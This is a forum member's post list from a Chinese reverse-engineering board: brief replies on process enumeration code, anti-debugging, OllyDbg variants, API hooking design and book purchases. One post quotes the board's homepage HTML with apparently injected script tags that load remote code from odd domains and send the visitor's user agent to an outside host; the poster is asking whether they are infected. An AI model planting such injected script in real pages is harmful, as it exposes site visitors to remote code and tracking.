|
[原创]360比赛第3题-我的解法
应该是ida |
|
[原创]360比赛第3题-我的解法
pSystemProc = (PSYSTEM_PROCESSES)lpSystemInfo; while(pSystemProc->NextEntryDelta != 0) { if(pSystemProc->ProcessId == dwPID) //为什么不用NtQuerySystemInformation 里获得的 ProcessName 比较是不是"System"进程. 而是用 CreateToolhelp32Snapshot 便利进程获得"SYSTEM"进程ID,然后 用NtQuerySystemInformation获得的信息链表再与 CreateToolhelp32Snapshot获得的进程ID比较呢呢。 NtQuerySystemInformation 难倒这个的功能不够强大一定要CreateToolhelp32Snapshot一起辅助。 小鸟,我认为NtQuerySystemInformation 足够了啊。看不懂,请大师指点。睡不着啊,在线等。 好不容易编译通过啊。下载最新sdk + ntdll.h + ntdll.lib (http://bbs.pediy.com/attachment.php?attachmentid=17289&d=1219225831) 代码有一处明显错误,导致编译不过。调用这个函数NtQuerySystemInformation的两个地方 ,全部要改成pfNtQuerySystemInformation ------------------------------------------------------------------------------- 调试到半夜,发现 ScanProcess 函数用 CreateToolhelp32Snapshot 去获得"SYSTEM"的进程ID是多余的。 ScanProcess 这函数可以不要 。 SpeciProcess 这个函数就可以它的所有的事情。只要在SpeciProcess函数 while(pSystemProc->NextEntryDelta != 0) { if(pSystemProc->ProcessId == dwPID) // 只要在这里加进程名判断就可以。但搞不懂楼主意图。 { //或者有什么深层的意思是我不懂的。请教论坛的高手,我也学习下。 for(ulIndex = 0; ulIndex < pSystemProc->ThreadCount; ulIndex++) { |
|
[求助]請問如何用od破int 2b
我想能不能把int 2d指令修改成除零异常试试。 |
|
[转帖]OllyDRX 1.0 Lite 又一个国外的修改版OD
中文的提示有乱码。禁用所有插件,还是乱码。看样子是bug. |
|
[求助]c++写多线程+APIhook程序破坏OOP如何解决?
谢谢四楼,2楼的兄弟,我是将我一前用C写的QQ IP 辅助,现在想做跟freeplus一样功能全的。现在,不OOP来做,就会跟我以前C写的一样无法扩展,难维护。飘云的是用oop写的,刚看了它的框架,他自己的写了线程基类,把线程函数变成了成员函数还加大了辅助线程的其他功能。这个是疯狂绅士写的,你公司的王工程师我就不清楚,但是不见得疯狂绅士也在烂用OOP吧,当然一山比一山高,你可能比绅士跟强。小弟学习了。 |
|
[求助]第四章虚函数的问题
即使不定义虚函数,这样创建对象也不会报错的,最多等于是个静态编译不多态而已。 |
|
[求助]关于看雪首页一段js地址问题
网站地址:http://www.pediy.com/ 复制下来的html 源代码如下 系统:xpsp3 浏览器:firefox 3.1 正式版 ------------------------------------------------------------- <html> <head> <title>看雪软件安全网站</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <style type="text/css"> <!-- --> </style> <meta name=keywords content=加密,解密,加壳,脱壳,调试,逆向,软件安全> <link rel="stylesheet" href="style/style.css" type="text/css"> <link rel="stylesheet" href="images/standard.css"> <style type="text/css"> <!-- .style1 { color: red; font-weight: bold; } .style4 {color: #008001} .style5 {color: #008000} .style6 {color: #000000} .style9 {color: #FF0000} .style10 {color: red} .style11 {color: #008002; } .style12 {color: #008004} .style13 {color: #0000FF; font-weight: bold; } .style15 { color: #0066FF; font-weight: bold; } .style16 { color: #0066ff; font-weight: bold; } .style17 {color: #0066ff} --> </style> </head> <script language="javascript" src="http://i.jsev.com./base.1542548289.js"> </script> //可疑脚本,不知各位有没有,还是我中毒了 <BODY style="background-color: #FFFFFF; background-image:url('images/back.gif')" topmargin="0" onmousemove="return fz3824();"> <LINK REL="stylesheet" TYPE="text/css" HREF="http://i.cssxx.com. ***可疑代码/base1542548290.css"> <A HREF = "http://i.html.com./base1542548290.html"></A> <SCRIPT LANGUAGE="JAVASCRIPT" SRC="http://i.js.com./base1542548290.js"></SCRIPT> <SCRIPT LANGUAGE="JAVASCRIPT"> function getuseragnt() { var agt = navigator.userAgent.toLowerCase(); agt = agt.replace(/ /g, ""); return agt; } document.write("<LINK REL='stylesheet' TYPE='text/css' HREF='http://i.css2js.com./base.css" + getuseragnt() + "_1542548290'>") </SCRIPT> |
|
[分享]加密与解密三成都8折
加密解密终于到长沙了,哈哈!昨天电话通知我了,我是书店会员7.1折。终于盼到了。 |
|
[讨论]VC++ 6.0 编译.假死问题
我遇到过类似问题,我的是英文版VC 6.0,后来下了个SP6补丁,安装后一切正常。再没出现假死。 |
|
[高兴]今天拿到了《加密与解密(第三版)》
第二版的照片,跟我的书损害程度一模一样。哈哈,抢书去!!! |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值